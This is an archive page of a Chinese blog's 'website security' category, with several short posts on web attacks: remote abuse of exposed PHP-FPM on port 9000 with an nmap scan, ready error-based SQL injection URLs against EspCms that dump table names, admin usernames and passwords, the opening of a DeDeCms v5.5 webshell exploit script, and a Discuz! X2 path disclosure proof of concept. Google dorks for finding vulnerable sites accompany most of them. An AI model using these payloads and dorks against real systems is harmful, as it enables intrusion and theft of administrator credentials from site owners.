存档

‘网站安全’ 分类的存档

PHP FastCGI 的远程利用

2012年9月18日 4 条评论

说到FastCGI,大家都知道这是目前最常见的webserver动态脚本执行模型之一。目前基本所有web脚本都基本支持这种模式,甚至有的类型脚本这是唯一的模式(ROR,Python等)。

FastCGI的主要目的就是,将webserver和动态语言的执行分开为两个不同的常驻进程,当webserver接收到动态脚本的请求,就通过fcgi协议将请求通过网络转发给fcgi进程,由fcgi进程进行处理之后,再将结果传送给webserver,然后webserver再输出给浏览器。这种模型由于不用每次请求都重新启动一次cgi,也不用嵌入脚本解析器到webserver中去,因此可伸缩性很强,一旦动态脚本请求量增加,就可以将后端fcgi进程单独设立一个集群提供服务,很大的增加了可维护性,这也是为什么fcgi等类似模式如此流行的原因之一。

然而正是因为这种模式,却也带来了一些问题。例如去年80sec发布的[link href=”http://www.80sec.com/nginx-securit.html”]《nginx文件解析漏洞》[/link] 实际上就是由于fcgi和webserver对script路径级参数的理解不同出现的问题。除此之外,由于fcgi和webserver是通过网络进行沟通的,因此目前越来越多的集群将fcgi直接绑定在公网上,所有人都可以对其进行访问。这样就意味着,任何人都可以伪装成webserver,让fcgi执行我们想执行的脚本内容。

ok,以上就是背景原理解释,我这里就用我最熟悉的PHP给各位做个例子。

php的fastcgi目前通常叫做FPM。他默认监听的端口是9000端口。我们这里用nmap直接扫描一下:

[code]nmap -sV -p 9000 –open x.x.x.x/24[/code]

为什么要用sV?因为9000端口可能还存在其他服务,这里需要借用nmap的指纹识别先帮我们鉴定一下。

阅读全文…

分类: 网站安全 标签: ,

EspCms 网站系统注入漏洞

2011年11月29日 4 条评论

 

关键字:inurl:index.php?ac=article&at=read&did=

注入点(爆表前缀):index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,table_name,0x27,0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23

爆用户名:
index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,username,0x27,0x7e)) from 前缀_admin_member limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23)

爆密码:index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,password,0x27,0x7e)) from 前缀_admin_member limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23

 

注意x号

分类: 网站安全 标签:

DeDeCms v5.5 Getwebshell Exploit

2011年11月29日 8 条评论
Exploit Code:
-----------分割线------------
<?php
print_r('
+----------------------------------------+
dedecms v5.5 final getwebshell exploit
+----------------------------------------+
');
if ($argc < 3) {
print_r('
+----------------------------------------+
Usage: php '.$argv[0].' host path
host:      target server (ip/hostname)
path:      path to dedecms
Example:
php '.$argv[0].' localhost /dedecms/
+----------------------------------------+
');
exit;
}
error_reporting(7);
ini_set('max_execution_time', 0);

阅读全文…

分类: 网站安全 标签:

Discuz! x2 物理路径泄漏

2011年11月29日 3 条评论
POC:
Google,
intext: discuz! x2 intitle:论坛- Powered by Discuz
http://bbs.xxx.com/source/function/function_connect.php
-------------------------------------------------------------
文件头部没有加:

if(!defined(‘IN_DISCUZ’)) {

exit(‘Access Denied’);

}

并且在头部包函了其他文件:

require_once libfile(‘function/cloud’);
-------------------------------------------------------------
临时解决办法:
修改function_connect.php 权限。
普人特福的博客cnzz&51la for wordpress,cnzz for wordpress,51la for wordpress